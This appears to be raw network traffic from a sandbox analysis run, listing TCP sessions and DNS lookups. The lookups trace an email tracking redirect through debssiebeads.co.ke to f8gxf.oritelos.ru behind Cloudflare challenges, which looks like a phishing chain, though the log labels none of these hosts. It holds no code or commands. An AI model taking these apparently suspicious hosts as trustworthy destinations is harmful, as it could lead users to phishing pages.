                                                May 30, 2024 12:21:17.088720083 CEST49817443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:17.088732004 CEST44349817188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:17.088829994 CEST44349817188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:17.089673996 CEST49817443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:17.113497019 CEST49817443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:17.113554001 CEST44349817188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:17.417649031 CEST44349818188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:17.417933941 CEST44349818188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:17.418046951 CEST49818443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:17.454363108 CEST49818443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:17.454421043 CEST44349818188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:22.197768927 CEST44349776104.17.2.184192.168.2.4
                                                May 30, 2024 12:21:22.197832108 CEST44349776104.17.2.184192.168.2.4
                                                May 30, 2024 12:21:22.197978020 CEST49776443192.168.2.4104.17.2.184
                                                May 30, 2024 12:21:23.085561037 CEST49776443192.168.2.4104.17.2.184
                                                May 30, 2024 12:21:23.085629940 CEST44349776104.17.2.184192.168.2.4
                                                May 30, 2024 12:21:23.296886921 CEST4973780192.168.2.434.211.60.110
                                                May 30, 2024 12:21:23.302440882 CEST804973734.211.60.110192.168.2.4
                                                May 30, 2024 12:21:23.746973991 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:23.747056961 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:23.747986078 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:23.750263929 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:23.750300884 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:23.914146900 CEST4973680192.168.2.434.211.60.110
                                                May 30, 2024 12:21:23.919109106 CEST804973634.211.60.110192.168.2.4
                                                May 30, 2024 12:21:24.250394106 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:24.250658989 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:24.250718117 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:24.251220942 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:24.251519918 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:24.251611948 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:24.303565979 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.086730003 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.086797953 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.086883068 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.087069035 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.087086916 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.580231905 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.580674887 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.580703974 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.581192017 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.581641912 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.581732988 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.581887960 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:25.628499985 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:25.631990910 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:26.246800900 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:26.247113943 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:26.247205019 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:26.247276068 CEST44349820188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:26.247314930 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:26.247638941 CEST49820443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:36.852804899 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:36.852896929 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:36.852991104 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:36.853199959 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:36.853239059 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.320820093 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.321199894 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:37.321221113 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.321542025 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.321814060 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:37.321892023 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.321934938 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:37.368495941 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.991128922 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.991240025 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:37.991497040 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:37.991497993 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:38.304960012 CEST49823443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:38.305022001 CEST44349823188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:39.072474957 CEST4973780192.168.2.434.211.60.110
                                                May 30, 2024 12:21:39.078511953 CEST804973734.211.60.110192.168.2.4
                                                May 30, 2024 12:21:39.078582048 CEST4973780192.168.2.434.211.60.110
                                                May 30, 2024 12:21:39.348690033 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:39.348885059 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:39.348943949 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:41.325790882 CEST49819443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:41.325823069 CEST44349819188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:41.326848984 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:41.326925039 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:41.326996088 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:41.327266932 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:41.327301025 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:41.976927996 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:41.995361090 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:41.995423079 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:41.996579885 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:41.997204065 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:41.997395992 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:42.037872076 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:47.032773972 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.032851934 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.032927036 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.033360004 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.033396959 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.517596006 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.517910957 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.517935038 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.518924952 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.518997908 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.519473076 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.519588947 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.519650936 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.519659996 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.569123030 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.650228024 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.650315046 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.650455952 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.650482893 CEST4434982535.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.650495052 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.651014090 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.651035070 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:47.651043892 CEST49825443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.651089907 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.651323080 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:47.651335955 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.121481895 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.121925116 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:48.121948004 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.122412920 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.123157978 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:48.123277903 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:48.123290062 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.164539099 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.178575993 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:48.253015995 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.253103971 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:48.253191948 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:48.253407001 CEST49826443192.168.2.435.190.80.1
                                                May 30, 2024 12:21:48.253446102 CEST4434982635.190.80.1192.168.2.4
                                                May 30, 2024 12:21:51.880556107 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:51.880717993 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:51.880815983 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:52.319195986 CEST49775443192.168.2.4151.101.194.137
                                                May 30, 2024 12:21:52.319252968 CEST44349775151.101.194.137192.168.2.4
                                                May 30, 2024 12:21:53.071178913 CEST49824443192.168.2.4142.250.184.196
                                                May 30, 2024 12:21:53.071207047 CEST44349824142.250.184.196192.168.2.4
                                                May 30, 2024 12:21:58.022799015 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:58.022888899 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.022975922 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:58.023268938 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:58.023293972 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.528686047 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.528990984 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:58.529014111 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.529567957 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.529930115 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:58.530011892 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.530122995 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:58.572516918 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:58.584644079 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:59.271790028 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:59.271975040 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:59.272008896 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:59.272032022 CEST44349827188.114.96.3192.168.2.4
                                                May 30, 2024 12:21:59.272232056 CEST49827443192.168.2.4188.114.96.3
                                                May 30, 2024 12:21:59.272232056 CEST49827443192.168.2.4188.114.96.3
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 30, 2024 12:20:36.863472939 CEST53582771.1.1.1192.168.2.4
                                                May 30, 2024 12:20:36.864780903 CEST53586271.1.1.1192.168.2.4
                                                May 30, 2024 12:20:38.108047009 CEST5156153192.168.2.41.1.1.1
                                                May 30, 2024 12:20:38.108401060 CEST5885253192.168.2.41.1.1.1
                                                May 30, 2024 12:20:38.633678913 CEST53620281.1.1.1192.168.2.4
                                                May 30, 2024 12:20:38.918673038 CEST4949353192.168.2.41.1.1.1
                                                May 30, 2024 12:20:38.918798923 CEST5780953192.168.2.41.1.1.1
                                                May 30, 2024 12:20:39.245910883 CEST53578091.1.1.1192.168.2.4
                                                May 30, 2024 12:20:39.333755016 CEST53494931.1.1.1192.168.2.4
                                                May 30, 2024 12:20:41.254300117 CEST5477453192.168.2.41.1.1.1
                                                May 30, 2024 12:20:41.254600048 CEST5893753192.168.2.41.1.1.1
                                                May 30, 2024 12:20:41.261620045 CEST53547741.1.1.1192.168.2.4
                                                May 30, 2024 12:20:41.262363911 CEST53589371.1.1.1192.168.2.4
                                                May 30, 2024 12:20:41.451781988 CEST6538653192.168.2.41.1.1.1
                                                May 30, 2024 12:20:41.452193975 CEST6299653192.168.2.41.1.1.1
                                                May 30, 2024 12:20:41.560619116 CEST53653861.1.1.1192.168.2.4
                                                May 30, 2024 12:20:41.710812092 CEST53629961.1.1.1192.168.2.4
                                                May 30, 2024 12:20:43.337790966 CEST6258653192.168.2.41.1.1.1
                                                May 30, 2024 12:20:43.338118076 CEST5759053192.168.2.41.1.1.1
                                                May 30, 2024 12:20:43.338793993 CEST5962253192.168.2.41.1.1.1
                                                May 30, 2024 12:20:43.338793993 CEST5689053192.168.2.41.1.1.1
                                                May 30, 2024 12:20:43.344573021 CEST53625861.1.1.1192.168.2.4
                                                May 30, 2024 12:20:43.344866037 CEST53575901.1.1.1192.168.2.4
                                                May 30, 2024 12:20:43.345503092 CEST53596221.1.1.1192.168.2.4
                                                May 30, 2024 12:20:43.345592976 CEST53568901.1.1.1192.168.2.4
                                                May 30, 2024 12:20:45.084384918 CEST6222653192.168.2.41.1.1.1
                                                May 30, 2024 12:20:45.084578037 CEST6095553192.168.2.41.1.1.1
                                                May 30, 2024 12:20:45.091593981 CEST53622261.1.1.1192.168.2.4
                                                May 30, 2024 12:20:45.091790915 CEST53609551.1.1.1192.168.2.4
                                                May 30, 2024 12:20:46.503623962 CEST6264253192.168.2.41.1.1.1
                                                May 30, 2024 12:20:46.504441977 CEST5183053192.168.2.41.1.1.1
                                                May 30, 2024 12:20:46.511126995 CEST53626421.1.1.1192.168.2.4
                                                May 30, 2024 12:20:46.511360884 CEST53518301.1.1.1192.168.2.4
                                                May 30, 2024 12:20:47.020378113 CEST5697853192.168.2.41.1.1.1
                                                May 30, 2024 12:20:47.020524979 CEST6362753192.168.2.41.1.1.1
                                                May 30, 2024 12:20:47.027281046 CEST53569781.1.1.1192.168.2.4
                                                May 30, 2024 12:20:47.027522087 CEST53636271.1.1.1192.168.2.4
                                                May 30, 2024 12:20:55.797477007 CEST53536391.1.1.1192.168.2.4
                                                May 30, 2024 12:20:55.982918978 CEST138138192.168.2.4192.168.2.255
                                                May 30, 2024 12:21:06.821456909 CEST6378353192.168.2.41.1.1.1
                                                May 30, 2024 12:21:06.821582079 CEST5630753192.168.2.41.1.1.1
                                                May 30, 2024 12:21:06.924696922 CEST53563071.1.1.1192.168.2.4
                                                May 30, 2024 12:21:06.975086927 CEST53637831.1.1.1192.168.2.4
                                                May 30, 2024 12:21:09.584984064 CEST5136553192.168.2.41.1.1.1
                                                May 30, 2024 12:21:09.584985018 CEST5947553192.168.2.41.1.1.1
                                                May 30, 2024 12:21:09.585628986 CEST5624453192.168.2.41.1.1.1
                                                May 30, 2024 12:21:09.585628986 CEST6068853192.168.2.41.1.1.1
                                                May 30, 2024 12:21:09.592912912 CEST53594751.1.1.1192.168.2.4
                                                May 30, 2024 12:21:09.592952013 CEST53606881.1.1.1192.168.2.4
                                                May 30, 2024 12:21:09.593112946 CEST53513651.1.1.1192.168.2.4
                                                May 30, 2024 12:21:09.593276978 CEST53562441.1.1.1192.168.2.4
                                                May 30, 2024 12:21:11.031145096 CEST53567431.1.1.1192.168.2.4
                                                May 30, 2024 12:21:14.003256083 CEST53576721.1.1.1192.168.2.4
                                                May 30, 2024 12:21:14.733418941 CEST53607471.1.1.1192.168.2.4
                                                May 30, 2024 12:21:36.642838001 CEST53507351.1.1.1192.168.2.4
                                                May 30, 2024 12:21:37.705913067 CEST53632881.1.1.1192.168.2.4
                                                May 30, 2024 12:21:47.024590015 CEST6488853192.168.2.41.1.1.1
                                                May 30, 2024 12:21:47.025074959 CEST6253853192.168.2.41.1.1.1
                                                May 30, 2024 12:21:47.031888962 CEST53625381.1.1.1192.168.2.4
                                                May 30, 2024 12:21:47.031960964 CEST53648881.1.1.1192.168.2.4
                                                TimestampSource IPDest IPChecksumCodeType
                                                May 30, 2024 12:20:41.711492062 CEST192.168.2.41.1.1.1c230(Port unreachable)Destination Unreachable
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 30, 2024 12:20:38.108047009 CEST192.168.2.41.1.1.10xf43dStandard query (0)t.email1.gct.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:38.108401060 CEST192.168.2.41.1.1.10xf230Standard query (0)t.email1.gct.com65IN (0x0001)false
                                                May 30, 2024 12:20:38.918673038 CEST192.168.2.41.1.1.10x8099Standard query (0)debssiebeads.co.keA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:38.918798923 CEST192.168.2.41.1.1.10x66c6Standard query (0)debssiebeads.co.ke65IN (0x0001)false
                                                May 30, 2024 12:20:41.254300117 CEST192.168.2.41.1.1.10x4742Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:41.254600048 CEST192.168.2.41.1.1.10xfb29Standard query (0)www.google.com65IN (0x0001)false
                                                May 30, 2024 12:20:41.451781988 CEST192.168.2.41.1.1.10x1cf8Standard query (0)f8gxf.oritelos.ruA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:41.452193975 CEST192.168.2.41.1.1.10x5726Standard query (0)f8gxf.oritelos.ru65IN (0x0001)false
                                                May 30, 2024 12:20:43.337790966 CEST192.168.2.41.1.1.10x3667Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.338118076 CEST192.168.2.41.1.1.10x467dStandard query (0)code.jquery.com65IN (0x0001)false
                                                May 30, 2024 12:20:43.338793993 CEST192.168.2.41.1.1.10x1fbeStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.338793993 CEST192.168.2.41.1.1.10x8c8aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:20:45.084384918 CEST192.168.2.41.1.1.10xf894Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:45.084578037 CEST192.168.2.41.1.1.10xe5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:20:46.503623962 CEST192.168.2.41.1.1.10x780bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:46.504441977 CEST192.168.2.41.1.1.10xaed4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:20:47.020378113 CEST192.168.2.41.1.1.10x46a4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:47.020524979 CEST192.168.2.41.1.1.10x57c8Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:21:06.821456909 CEST192.168.2.41.1.1.10x74bfStandard query (0)f8gxf.oritelos.ruA (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:06.821582079 CEST192.168.2.41.1.1.10xfaceStandard query (0)f8gxf.oritelos.ru65IN (0x0001)false
                                                May 30, 2024 12:21:09.584984064 CEST192.168.2.41.1.1.10x5faeStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:09.584985018 CEST192.168.2.41.1.1.10xb2c5Standard query (0)cdn.socket.io65IN (0x0001)false
                                                May 30, 2024 12:21:09.585628986 CEST192.168.2.41.1.1.10xea4eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:09.585628986 CEST192.168.2.41.1.1.10x8fb7Standard query (0)www.google.com65IN (0x0001)false
                                                May 30, 2024 12:21:47.024590015 CEST192.168.2.41.1.1.10xf5d2Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:47.025074959 CEST192.168.2.41.1.1.10x3feStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 30, 2024 12:20:38.266525030 CEST1.1.1.1192.168.2.40xf43dNo error (0)t.email1.gct.comgrandcircle-t.neolane.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:38.266525030 CEST1.1.1.1192.168.2.40xf43dNo error (0)grandcircle-t.neolane.netgrandcirclecorporation-mid-prod2-t.adobe-campaign.comCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:38.266525030 CEST1.1.1.1192.168.2.40xf43dNo error (0)grandcirclecorporation-mid-prod2-t.adobe-campaign.comgrandcirclecorporation-mid-prod2-cus.campaign.adobe.comCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:38.266525030 CEST1.1.1.1192.168.2.40xf43dNo error (0)grandcirc-customer-4ki76tmy1tml-301397825.us-west-2.elb.amazonaws.com34.211.60.110A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:38.266525030 CEST1.1.1.1192.168.2.40xf43dNo error (0)grandcirc-customer-4ki76tmy1tml-301397825.us-west-2.elb.amazonaws.com35.83.97.34A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:38.284132004 CEST1.1.1.1192.168.2.40xf230No error (0)t.email1.gct.comgrandcircle-t.neolane.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:38.284132004 CEST1.1.1.1192.168.2.40xf230No error (0)grandcircle-t.neolane.netgrandcirclecorporation-mid-prod2-t.adobe-campaign.comCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:38.284132004 CEST1.1.1.1192.168.2.40xf230No error (0)grandcirclecorporation-mid-prod2-t.adobe-campaign.comgrandcirclecorporation-mid-prod2-cus.campaign.adobe.comCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:39.333755016 CEST1.1.1.1192.168.2.40x8099No error (0)debssiebeads.co.ke217.174.152.52A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:41.261620045 CEST1.1.1.1192.168.2.40x4742No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:41.262363911 CEST1.1.1.1192.168.2.40xfb29No error (0)www.google.com65IN (0x0001)false
                                                May 30, 2024 12:20:41.560619116 CEST1.1.1.1192.168.2.40x1cf8No error (0)f8gxf.oritelos.ru188.114.96.3A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:41.560619116 CEST1.1.1.1192.168.2.40x1cf8No error (0)f8gxf.oritelos.ru188.114.97.3A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:41.710812092 CEST1.1.1.1192.168.2.40x5726No error (0)f8gxf.oritelos.ru65IN (0x0001)false
                                                May 30, 2024 12:20:43.344573021 CEST1.1.1.1192.168.2.40x3667No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.344573021 CEST1.1.1.1192.168.2.40x3667No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.344573021 CEST1.1.1.1192.168.2.40x3667No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.344573021 CEST1.1.1.1192.168.2.40x3667No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.345503092 CEST1.1.1.1192.168.2.40x1fbeNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.345503092 CEST1.1.1.1192.168.2.40x1fbeNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:43.345592976 CEST1.1.1.1192.168.2.40x8c8aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:20:45.091593981 CEST1.1.1.1192.168.2.40xf894No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:45.091593981 CEST1.1.1.1192.168.2.40xf894No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:45.091790915 CEST1.1.1.1192.168.2.40xe5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:20:46.511126995 CEST1.1.1.1192.168.2.40x780bNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:46.511126995 CEST1.1.1.1192.168.2.40x780bNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:46.511360884 CEST1.1.1.1192.168.2.40xaed4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                May 30, 2024 12:20:47.027281046 CEST1.1.1.1192.168.2.40x46a4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:52.579247952 CEST1.1.1.1192.168.2.40x47c1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:52.579247952 CEST1.1.1.1192.168.2.40x47c1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                May 30, 2024 12:20:54.146198988 CEST1.1.1.1192.168.2.40x98e9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:20:54.146198988 CEST1.1.1.1192.168.2.40x98e9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:06.253247976 CEST1.1.1.1192.168.2.40x4811No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:21:06.253247976 CEST1.1.1.1192.168.2.40x4811No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:06.924696922 CEST1.1.1.1192.168.2.40xfaceNo error (0)f8gxf.oritelos.ru65IN (0x0001)false
                                                May 30, 2024 12:21:06.975086927 CEST1.1.1.1192.168.2.40x74bfNo error (0)f8gxf.oritelos.ru188.114.96.3A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:06.975086927 CEST1.1.1.1192.168.2.40x74bfNo error (0)f8gxf.oritelos.ru188.114.97.3A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:09.592912912 CEST1.1.1.1192.168.2.40xb2c5No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:21:09.592952013 CEST1.1.1.1192.168.2.40x8fb7No error (0)www.google.com65IN (0x0001)false
                                                May 30, 2024 12:21:09.593112946 CEST1.1.1.1192.168.2.40x5faeNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:21:09.593112946 CEST1.1.1.1192.168.2.40x5faeNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.47A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:09.593112946 CEST1.1.1.1192.168.2.40x5faeNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.97A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:09.593112946 CEST1.1.1.1192.168.2.40x5faeNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.11A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:09.593112946 CEST1.1.1.1192.168.2.40x5faeNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.40A (IP address)IN (0x0001)false
